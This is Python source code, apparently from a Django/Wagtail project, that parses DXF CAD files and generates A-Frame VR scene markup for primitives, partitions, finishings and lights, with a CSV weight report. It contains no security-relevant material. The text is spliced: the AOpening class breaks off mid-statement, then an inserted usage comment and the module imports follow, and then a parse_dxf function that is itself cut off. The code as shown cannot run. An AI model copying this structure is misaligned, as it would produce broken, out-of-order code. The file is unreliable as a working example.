{data['220']}">\n' outstr += f'<a-circle id="circle-{x}" \n' if data['2'] == 'circle': outstr += f'rotation="-90 0 
0"\n' outstr += f'radius="{fabs(data['41'])}" \n' outstr += 'geometry="' try: if data['segments']!='32': outstr += f'segments: {data['segments']};' if data['theta-length']!='360': outstr += f'theta-length: {data['theta-length']};' if data['theta-start']!='0': outstr += f'theta-start: {data['theta-start']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-circle>\n</a-entity>\n' return outstr def make_cylinder(page_obj, x, data): outstr = f'<a-entity id="cylinder-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-cylinder id="cylinder-{x}" \n' outstr += f'position="0 {data['43']/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data['41'])} {fabs(data['43'])} {fabs(data['42'])}" \n' outstr += 'geometry="' try: if data['open-ended']!='false': outstr += 'open-ended: true;' if data['radius-top']!='0': outstr += f'radius-top: {data['radius-top']};' if data['segments-height']!='18': outstr += f'segments-height: {data['segments-height']};' if data['segments-radial']!='36': outstr += f'segments-radial: {data['segments-radial']};' if data['theta-length']!='360': outstr += f'theta-length: {data['theta-length']};' if data['theta-start']!='0': outstr += f'theta-start: {data['theta-start']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-cylinder>\n</a-entity>\n' return outstr def make_curvedimage(x, data): outstr = f'<a-entity id="curvedimage-{x}-ent" \n' outstr += 'shadow="receive: false; cast: false" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-curvedimage id="curvedimage-{x}" \n' outstr += f'position="0 {data['43']/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data['41'])} {fabs(data['43'])} {fabs(data['42'])}" \n' try: if data['theta-length']!='270': outstr += f'theta-length="{data['theta-length']}" ' if data['theta-start']!='0': outstr += f'theta-start="{data['theta-start']}" ' except KeyError: pass outstr += f'src="#image-{data['8']}">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-curvedimage>\n</a-entity>\n' return outstr def make_sphere(page_obj, x, data): outstr = f'<a-entity id="sphere-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-sphere id="sphere-{x}" \n' outstr += f'position="0 {data['43']} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data['41'])} {fabs(data['43'])} {fabs(data['42'])}" \n' outstr += 'geometry="' try: if data['phi-length']!='360': outstr += f'phi-length: {data['phi-length']};' if data['phi-start']!='0': outstr += f'phi-start: {data['phi-start']};' if data['segments-height']!='18': outstr += f'segments-height: 
{data['segments-height']};' if data['segments-width']!='36': outstr += f'segments-width: {data['segments-width']};' if data['theta-length']!='180': outstr += f'theta-length: {data['theta-length']};' if data['theta-start']!='0': outstr += f'theta-start: {data['theta-start']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-sphere>\n</a-entity>\n' return outstr def make_plane(page_obj, x, data): outstr = f'<a-entity id="plane-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-plane id="plane-{x}" \n' if data['2'] == 'look-at':#if it's a look at, it is centered and looks at the camera foot outstr += f'position="0 {data['43']/2} 0" \n' outstr += 'look-at="#camera-foot" \n' elif data['2'] == 'ceiling':#if it's a ceiling, correct position outstr += f'position="{data['41']/2} {-data['43']/2} 0" \n' else:#insertion is at corner outstr += f'position="{data['41']/2} {data['43']/2} 0" \n' outstr += f'width="{fabs(data['41'])}" height="{fabs(data['43'])}" \n' outstr += 'geometry="' try: if data['segments-height']!='1': outstr += f'segments-height: {data['segments-height']};' if data['segments-width']!='1': outstr += f'segments-width: {data['segments-width']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-plane>\n</a-entity>\n' return outstr def make_text(x, data): outstr = f'<a-entity id="text-{x}" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}"\n' outstr += f'text="width: {data['41']}; align: {data['align']}; color: {data['color']}; ' outstr += f'value: {data['text']}; wrap-count: {data['wrap-count']}; ' outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-entity>\n' return outstr def make_link(page_obj, x, data): outstr = f'<a-link id="link-{x}" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}"\n' outstr += f'scale="{data['41']} {data['43']} {data['42']}"\n' if data['tree'] == 'parent': target = page_obj.get_parent() elif data['tree'] == 'child': target = page_obj.get_first_child() elif data['tree'] == 'previous' or data['tree'] == 'prev': target = page_obj.get_prev_sibling() else:#we default to next sibling target = page_obj.get_next_sibling() try: if target: outstr += f'href="{target.url}"\n' outstr += f'title="{data['title']}" color="{data['color']}" on="click"\n' eq_image = target.specific.equirectangular_image if eq_image: outstr += f'image="{eq_image.file.url}"' else: outstr += 'image="#default-sky"' outstr += '>\n' if data['animation']: outstr += is_animation(data) outstr += '</a-link>\n' return outstr else: return '' except: return '' def make_triangle(page_obj, x, data): outstr = f'<a-triangle id="triangle-{x}" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'geometry="vertexA:{data['10']} {data['30']} {data['20']}; \n' outstr += 
f'vertexB:{data['11']} {data['31']} {data['21']}; \n' outstr += f'vertexC:{data['12']} {data['32']} {data['22']}" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}; ' if page_obj.double_face: outstr += 'side: double; ' outstr += '">\n</a-triangle> \n' return outstr def make_light(page_obj, x, data): outstr = f'<a-entity id="light-{x}" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}"\n' try: if data['type'] == 'ambient': outstr += f'light="type: ambient; color: {data['color']}; intensity: {data['intensity']}; ' outstr += '">\n' elif data['type'] == 'point': outstr += f'light="type: point; color: {data['color']}; intensity: {data['intensity']}; ' outstr += f'decay: {data['decay']}; distance: {data['distance']}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += '"> \n' elif data['type'] == 'spot': outstr += f'light="type: spot; color: {data['color']}; intensity: {data['intensity']}; ' outstr += f'decay: {data['decay']}; distance: {data['distance']}; ' outstr += f'angle: {data['angle']}; penumbra: {data['penumbra']}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += f'target: #light-{x}-target;"> \n' outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n' else:#defaults to directional outstr += f'light="type: directional; color: {data['color']}; intensity: {data['intensity']}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += f'shadowCameraBottom: {-5*fabs(data['42'])}; \n' outstr += f'shadowCameraLeft: {-5*fabs(data['41'])}; \n' outstr += f'shadowCameraTop: {5*fabs(data['42'])}; \n' outstr += f'shadowCameraRight: {5*fabs(data['41'])}; \n' outstr += f'target: #light-{x}-target;"> \n' outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n' except KeyError:#default if no light type is set outstr += 'light="type: point; intensity: 0.75; distance: 50; decay: 2; ' if page_obj.shadows: outstr += 'castShadow: true;' outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-entity>\n'#close light entity return outstr class APartition(object): def __init__(self, page_obj, data, types, finishings, csv_f): self.d = data#is it possible to use the self.__dict__=data construct? 
it would be much cleaner self.page_obj = page_obj.specific self.d['alert'] = 'None' self.type_obj = False if self.d['type']: try: self.type_obj = types.get(title = self.d['type']) except: pass self.finishings = finishings self.csv_f = csv_f def calc_weight(self): part_weight = 0 unit_weight = 0 zero_weight = 0 part_thickness = 0 fixed_thickness = True for part_layer in self.type_obj.part_layers.all(): part_layer_thickness = fabs(float(part_layer.thickness)) part_layer_weight = fabs(float(part_layer.weight)) if part_layer_thickness == 0: fixed_thickness = False zero_weight = part_layer_weight part_thickness += part_layer_thickness unit_weight += part_layer_thickness/100 * part_layer_weight unit_weight += (fabs(self.d['42']) - part_thickness/100) * zero_weight#add eventual zero thickness layer part_weight = unit_weight * fabs(self.d['41']) * fabs(self.d['43'])#actual part size if self.d['2'] == 'a-openwall': part_weight = part_weight - (unit_weight * fabs(self.d['door_off_2']-self.d['door_off_1']) * fabs(self.d['door_height']))#remove door if part_thickness and fixed_thickness and fabs(self.d['42']) != part_thickness/100: self.d['alert'] = 'Different than Partition Type' elif fabs(self.d['42']) < part_thickness/100: self.d['alert'] = 'Partition too thin' else: if self.type_obj.image: self.d['8'] = 'partition-' + self.type_obj.title self.d['repeat'] = self.type_obj.pattern if self.type_obj.color: self.d['color'] = self.type_obj.color #writing to csv file self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},-,-,{self.type_obj.title},{self.d['10']},{-self.d['20']},{self.d['30']},') self.csv_f.write(f'{self.d['210']},{-self.d['220']},{self.d['50']},{self.d['41']},{self.d['42']},{self.d['43']},{part_weight},{self.d['alert']} \n') return def no_weight(self): #writing to csv file self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},-,-,None,{self.d['10']},{-self.d['20']},{self.d['30']},') self.csv_f.write(f'{self.d['210']},{-self.d['220']},{self.d['50']},{self.d['41']},{self.d['42']},{self.d['43']},0,{self.d['alert']} \n') return def write_html(self): #start entity outstr = f'<a-entity id="{self.d['2']}-{self.d['num']}" \n' if self.page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{self.d['10']} {self.d['30']} {self.d['20']}" \n' outstr += f'rotation="{self.d['210']} {self.d['50']} {self.d['220']}">\n' #slab handle is on top if self.d['2'] == 'a-slab': y = self.d['43'] else: y = 0 #top surface if self.d['2'] == 'a-slab': self.d['side'] = 'floor' else: self.d['side'] = 'top' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="{self.d['41']/2} {self.d['43']-y} 0" \n' if self.d['43'] > 0: outstr += 'rotation="-90 0 0"> \n' else: outstr += 'rotation="-90 180 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #bottom surface, a-openwall has left and right bottoms if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'ceiling' else: self.d['side'] = 'bottom' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="{self.d['41']/2} {-y} 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += 
self.part_simple_finishing() outstr += '</a-entity> \n' #inside surface, a-openwall has left, right and top insides if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'front' else: self.d['side'] = 'in' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="{self.d['41']/2} {-y} 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside surface, a-openwall has left, right and top outsides if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'back' else: self.d['side'] = 'out' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="{self.d['41']/2} {-y} {-self.d['42']}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #left surface self.d['side'] = 'left' self.d['sub_side'] = 'left' self.d['width'] = fabs(self.d['42']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="0 {-y} {-self.d['42']/2}" \n' if self.d['41'] > 0: outstr += 'rotation="0 -90 0"> \n' else: outstr += 'rotation="0 90 0"> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #right surface self.d['side'] = 'right' self.d['sub_side'] = 'right' self.d['width'] = fabs(self.d['42']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['side']}-ent" \n' outstr += f'position="{self.d['41']} {-y} {-self.d['42']/2}" \n' if self.d['41'] < 0: outstr += 'rotation="0 -90 0"> \n' else: outstr += 'rotation="0 90 0"> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' if self.d['2'] == 'a-openwall': #bottom left surface self.d['side'] = 'bottom' self.d['sub_side'] = 'bottom-left' self.d['width'] = fabs(self.d['door_off_1']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['door_off_1']/2} 0 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #bottom right surface self.d['side'] = 'bottom' self.d['sub_side'] = 'bottom-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['width']/2+self.d['door_off_2']} 0 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #inside left surface self.d['side'] = 'in' self.d['sub_side'] = 'in-left' self.d['width'] = fabs(self.d['door_off_1']) 
self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['door_off_1']/2} 0 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #inside right surface self.d['side'] = 'in' self.d['sub_side'] = 'in-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['width']/2+self.d['door_off_2']} 0 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #inside top surface self.d['side'] = 'in' self.d['sub_side'] = 'in-top' self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['width']/2} {self.d['door_height']} 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside left surface self.d['side'] = 'out' self.d['sub_side'] = 'out-left' self.d['width'] = fabs(self.d['door_off_1']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['door_off_1']/2} 0 {-self.d['42']}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside right surface self.d['side'] = 'out' self.d['sub_side'] = 'out-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['width']/2+self.d['door_off_2']} 0 {-self.d['42']}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside top surface self.d['side'] = 'out' self.d['sub_side'] = 'out-top' self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-ent" \n' outstr += f'position="{self.d['width']/2} {self.d['door_height']} {-self.d['42']}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #end entity outstr += '</a-entity>\n' return outstr def part_simple_finishing(self): try: finishing = self.finishings.get(title = self.d[self.d['side']]) if self.d['side']=="floor": if finishing.skirting_image: part_image = 'skirting-' + finishing.title part_repeat = finishing.skirting_pattern else: part_image = self.d['8'] part_repeat = self.d['repeat'] if finishing.skirting_color: part_color = finishing.skirting_color else: part_color = self.d['color'] else: if finishing.image: part_image = 'finishing-' + finishing.title part_repeat = finishing.pattern else: part_image = self.d['8'] part_repeat = self.d['repeat'] if finishing.color: part_color = finishing.color else: part_color = self.d['color'] 
self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},{self.d['sub_side']},-,{part_image},-,-,-,-,-,-,-,{self.d['width']},{self.d['height']},-,-,- \n') except: part_image = self.d['8'] part_repeat = self.d['repeat'] part_color = self.d['color'] outstr = f'<a-plane id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}" \n' outstr += f'position="0 {self.d['height']/2} 0" \n' outstr += f'width="{self.d['width']}" height="{self.d['height']}"\n' outstr += f'material="src: #image-{part_image}; color: {part_color}' outstr += is_repeat(part_repeat, self.d['width'], self.d['height']) outstr += '">\n</a-plane>\n' return outstr def part_striped_finishing(self): if self.d['sub_side']=='in-top' or self.d['sub_side']=='out-top': door_height = fabs(self.d['door_height'])*self.d['43']/fabs(self.d['43']) else: door_height = 0 try: finishing = self.finishings.get(title = self.d[self.d['side']]) wall_height = fabs(self.d['height']) tiling_height = fabs(float(finishing.tiling_height))/100*self.d['43']/fabs(self.d['43']) skirting_height = fabs(float(finishing.skirting_height))/100*self.d['43']/fabs(self.d['43']) if door_height > wall_height: door_height = wall_height tiling_height = wall_height skirting_height = wall_height else: if skirting_height < door_height: skirting_height = door_height if skirting_height > wall_height: skirting_height = wall_height if tiling_height < skirting_height: tiling_height = skirting_height if tiling_height > wall_height: tiling_height = wall_height wall_height = wall_height - tiling_height tiling_height = tiling_height - skirting_height skirting_height = skirting_height - door_height if finishing.image: wall_image = 'finishing-' + finishing.title wall_repeat = finishing.pattern else: wall_image = self.d['8'] wall_repeat = self.d['repeat'] if finishing.color: wall_color = finishing.color else: wall_color = self.d['color'] outstr = '' if wall_height: outstr += f'<a-plane id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}" \n' outstr += f'position="0 {wall_height/2+tiling_height+skirting_height} 0" \n' outstr += f'width="{self.d['width']}" height="{wall_height}" \n' outstr += f'material="src: #image-{wall_image}; color: {wall_color}' outstr += is_repeat(wall_repeat, self.d['width'], wall_height) outstr += '">\n</a-plane> \n' self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},{self.d['sub_side']},Wall,{finishing.title},-,-,-,-,-,-,{self.d['width']},{wall_height},-,-,- \n') if tiling_height: outstr += f'<a-plane id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-tiling" \n' outstr += f'position="0 {tiling_height/2+skirting_height} 0" \n' outstr += f'width="{self.d['width']}" height="{tiling_height}" \n' outstr += f'material="src: #image-tiling-{finishing.title}; color: {finishing.tiling_color}' outstr += is_repeat(finishing.tiling_pattern, self.d['width'], tiling_height) outstr += '">\n</a-plane> \n' self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},{self.d['sub_side']},Tiling,{finishing.title},-,-,-,-,-,-,{self.d['width']},{tiling_height},-,-,- \n') if skirting_height: outstr += f'<a-plane id="{self.d['2']}-{self.d['num']}-{self.d['sub_side']}-skirting" \n' outstr += f'position="0 {skirting_height/2} 0" \n' outstr += f'width="{self.d['width']}" height="{skirting_height}" \n' outstr += f'material="src: #image-skirting-{finishing.title}; color: {finishing.skirting_color}' outstr += is_repeat(finishing.skirting_pattern, self.d['width'], skirting_height) outstr += '">\n</a-plane> \n' 
self.csv_f.write(f'{self.d['num']},{self.d['layer']},{self.d['2']},{self.d['sub_side']},Skirting,{finishing.title},-,-,-,-,-,-,{self.d['width']},{skirting_height},-,-,- \n') except: outstr = f'<a-plane id="except-{self.d['2']}-{self.d['num']}-{self.d['sub_side']}" \n' outstr += f'position="0 {(self.d['height']-door_height)/2} 0" \n' outstr += f'width="{self.d['width']}" height="{self.d['height']-door_height}" \n' outstr += f'material="src: #image-{self.d['8']}; color: {self.d['color']}' outstr += is_repeat(self.d["repeat"], self.d["width"], self.d["height"]-door_height) outstr += f'">\n</a-plane> \n' return outstr def write_html_alert(self): outstr = f'<a-entity id="{self.d['2']}-{self.d['num']}-alert: {self.d['alert']}" \n' outstr += f'position="{self.d['10']} {self.d['30']} {self.d['20']}" \n' outstr += f'rotation="{self.d['210']} {self.d['50']} {self.d['220']}">\n' if self.d["2"] == 'a-openwall': outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-alert-left" \n' outstr += f'position="{self.d['door_off_1']/2} {self.d['door_height']/2} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['door_off_1'])} {fabs(self.d['door_height'])} {fabs(self.d['42'])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-alert-right" \n' outstr += f'position="{(self.d['41']-self.d['door_off_2'])/2+self.d['door_off_2']} {self.d['door_height']/2} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['41']-self.d['door_off_2'])} {fabs(self.d['door_height'])} {fabs(self.d['42'])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-alert-top" \n' outstr += f'position="{self.d['41']/2} {(self.d['43'] - self.d['door_height'])/2+self.d['door_height']} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['41'])} {fabs(self.d['43'] - self.d['door_height'])} {fabs(self.d['42'])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' else: outstr += f'<a-box id="{self.d['2']}-{self.d['num']}-alert" \n' outstr += f'position="{self.d['41']/2} {self.d['43']/2} {-self.d['42']/2}" \n' outstr += f'scale="{fabs(self.d['41'])} {fabs(self.d['43'])} {fabs(self.d['42'])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += '</a-entity>\n' return outstr class AOpening(object):#face it, this could be a APartition subclass def __init__(self, page_obj, data, types, finishings, csv_f): self.d = data#is it possible to use the self.__dict__=data construct? 
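# ---------------------------------------------------------------------------
# Usage sketch (illustrative assumption, not part of the original module):
# the functions defined below are typically chained as
# parse_dxf -> reference_openings -> make_html. The material_gallery,
# partitions and finishings arguments are assumed to be Django/Wagtail
# querysets, as implied by the .get(title=...) / .get(layer=...) calls,
# and page_obj an A-Frame page object exposing .specific / .shadows.
# The file names used here are hypothetical placeholders.
#
#   with open('model.dxf') as dxf_f, open('report.csv', 'w') as csv_f:
#       collection = parse_dxf(dxf_f, material_gallery)
#       collection = reference_openings(collection)
#       html = make_html(page_obj, collection, partitions, finishings, csv_f)
#       scene_body = ''.join(html[key] for key in sorted(html))
# ---------------------------------------------------------------------------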
from math import radians, sin, cos, asin, degrees, pi, sqrt, pow, fabs, atan2 def parse_dxf(dxf_f, material_gallery): output = {} layer_color = {} flag = False x = 0 value = 'dummy' while value !='ENTITIES': key = dxf_f.readline().strip() value = dxf_f.readline().strip() if value == 'AcDbLayerTableRecord':#dict of layer names and colors key = dxf_f.readline().strip() layer_name = dxf_f.readline().strip() key = dxf_f.readline().strip() value = dxf_f.readline().strip() key = dxf_f.readline().strip() layer_color[layer_name] = cad2hex(dxf_f.readline().strip()) elif value=='EOF' or key=='':#security to avoid loops if file is corrupted return output while value !='ENDSEC': key = dxf_f.readline().strip() value = dxf_f.readline().strip() if value=='EOF' or key=='':#security to avoid loops if file is corrupted return output if flag == 'face':#stores values for 3D faces if key == '8':#layer name data[key] = value elif key == '10' or key == '11' or key == '12' or key == '13':#X position data[key] = float(value) elif key == '20' or key == '21' or key == '22' or key == '23':#mirror Y position data[key] = -float(value) elif key == '30' or key == '31' or key == '32' or key == '33':#Z position data[key] = float(value) elif flag == 'block':#stores values for blocks if key == '2':#block name data[key] = value if key == '8':#layer name data[key] = value data['layer'] = value#sometimes key 8 is replaced, so I need the original layer value elif key == '10' or key == '30':#X Z position data[key] = float(value) elif key == '20':#Y position, mirrored data[key] = -float(value) elif key == '50':#Z rotation data[key] = float(value) elif key == '41' or key == '42' or key == '43':#scale values data[key] = float(value) elif key == '210':#X of OCS unitary vector Az_1 = float(value) P_x = data['10'] elif key == '220':#Y of OCS unitary vector Az_2 = float(value) P_y = -data['20']#reset original value elif key == '230':#Z of OCS unitary vector Az_3 = float(value) P_z = data['30'] #arbitrary axis algorithm #see if OCS z vector is close to world Z axis if fabs(Az_1) < (1/64) and fabs(Az_2) < (1/64): W = ('Y', 0, 1, 0) else: W = ('Z', 0, 0, 1) #cross product for OCS x arbitrary vector, normalized Ax_1 = W[2]*Az_3-W[3]*Az_2 Ax_2 = W[3]*Az_1-W[1]*Az_3 Ax_3 = W[1]*Az_2-W[2]*Az_1 Norm = sqrt(pow(Ax_1, 2)+pow(Ax_2, 2)+pow(Ax_3, 2)) Ax_1 = Ax_1/Norm Ax_2 = Ax_2/Norm Ax_3 = Ax_3/Norm #cross product for OCS y arbitrary vector, normalized Ay_1 = Az_2*Ax_3-Az_3*Ax_2 Ay_2 = Az_3*Ax_1-Az_1*Ax_3 Ay_3 = Az_1*Ax_2-Az_2*Ax_1 Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2)) Ay_1 = Ay_1/Norm Ay_2 = Ay_2/Norm Ay_3 = Ay_3/Norm #insertion world coordinates from OCS data['10'] = P_x*Ax_1+P_y*Ay_1+P_z*Az_1 data['20'] = P_x*Ax_2+P_y*Ay_2+P_z*Az_2 data['30'] = P_x*Ax_3+P_y*Ay_3+P_z*Az_3 #OCS X vector translated into WCS Ax_1 = ((P_x+cos(radians(data['50'])))*Ax_1+(P_y+sin(radians(data['50'])))*Ay_1+P_z*Az_1)-data['10'] Ax_2 = ((P_x+cos(radians(data['50'])))*Ax_2+(P_y+sin(radians(data['50'])))*Ay_2+P_z*Az_2)-data['20'] Ax_3 = ((P_x+cos(radians(data['50'])))*Ax_3+(P_y+sin(radians(data['50'])))*Ay_3+P_z*Az_3)-data['30'] #cross product for OCS y vector, normalized Ay_1 = Az_2*Ax_3-Az_3*Ax_2 Ay_2 = Az_3*Ax_1-Az_1*Ax_3 Ay_3 = Az_1*Ax_2-Az_2*Ax_1 Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2)) Ay_1 = Ay_1/Norm Ay_2 = Ay_2/Norm Ay_3 = Ay_3/Norm #A-Frame rotation order is Yaw(Z), Pitch(X) and Roll(Y) #thanks for help Marilena Vendittelli and https://www.geometrictools.com/ if Ay_3<1: if Ay_3>-1: pitch = asin(Ay_3) yaw = atan2(-Ay_1, Ay_2) roll = 
